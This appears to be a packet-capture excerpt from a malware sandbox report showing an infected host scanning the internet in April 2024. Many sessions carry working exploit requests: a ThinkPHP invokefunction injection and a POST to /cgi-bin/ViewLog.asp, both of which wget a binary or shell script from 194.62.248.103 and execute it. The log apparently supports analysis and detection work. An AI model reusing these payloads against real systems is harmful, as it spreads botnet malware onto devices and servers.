                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 67 66 2d 67 72 6f 73 73 69 73 74 65 73 2e 66 72 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.cgf-grossistes.fr Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1031192.168.2.2355366156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:31.717621088 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 33 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:30Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1032192.168.2.2355382156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:32.343552113 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 33 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:30Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1033192.168.2.2348170112.175.31.14680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.075366020 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:33.363722086 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:33 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1034192.168.2.233732431.136.243.1048080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.259272099 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:36.431852102 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:42.575047016 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:54.605741024 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:19.690084934 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1035192.168.2.233759631.136.122.2348080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.259381056 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:36.431858063 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:42.575048923 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:54.605603933 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:19.690084934 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1036192.168.2.233696631.130.91.1188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.279247999 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:33.673250914 CEST616INHTTP/1.1 404
                                                        Vary: Origin
                                                        Vary: Access-Control-Request-Method
                                                        Vary: Access-Control-Request-Headers
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        X-Frame-Options: DENY
                                                        Content-Disposition: inline;filename=f.txt
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Date: Sun, 14 Apr 2024 14:37:33 GMT
                                                        Keep-Alive: timeout=60
                                                        Connection: keep-alive
                                                        Data Raw: 37 39 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 34 2d 31 34 54 31 34 3a 33 37 3a 33 33 2e 38 39 33 2b 30 30 3a 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a
                                                        Data Ascii: 79{"timestamp":"2024-04-14T14:37:33.893+00:00","status":404,"error":"Not Found","message":"","path":"/cgi-bin/ViewLog.asp"}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1037192.168.2.233721894.121.219.318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.288238049 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1038192.168.2.235120094.123.38.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.290733099 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1039192.168.2.233671094.121.217.2538080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.630992889 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1040192.168.2.235513694.121.66.878080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.631053925 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1041192.168.2.234262894.122.58.638080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.631927967 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1042192.168.2.234297694.123.130.2018080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.631973982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1043192.168.2.235001295.86.125.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.642266989 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1044192.168.2.235711095.211.191.17380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.657006979 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:33.951683044 CEST433INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:33 GMT
                                                        Server: Apache/2.4.49 (Unix) LibreSSL/3.4.1
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1045192.168.2.233782295.101.203.4580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.663600922 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:33.966394901 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:37:33 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:33 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 31 66 30 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 35 33 26 23 34 36 3b 32 39 61 35 34 61 36 37 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 32 31 66 30 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 35 33 26 23 34 36 3b 32 39 61 35 34 61 36 37 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;21f01002&#46;1713105453&#46;29a54a67<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;21f01002&#46;1713105453&#46;29a54a67</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1046192.168.2.233664095.177.172.9580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:33.725456953 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
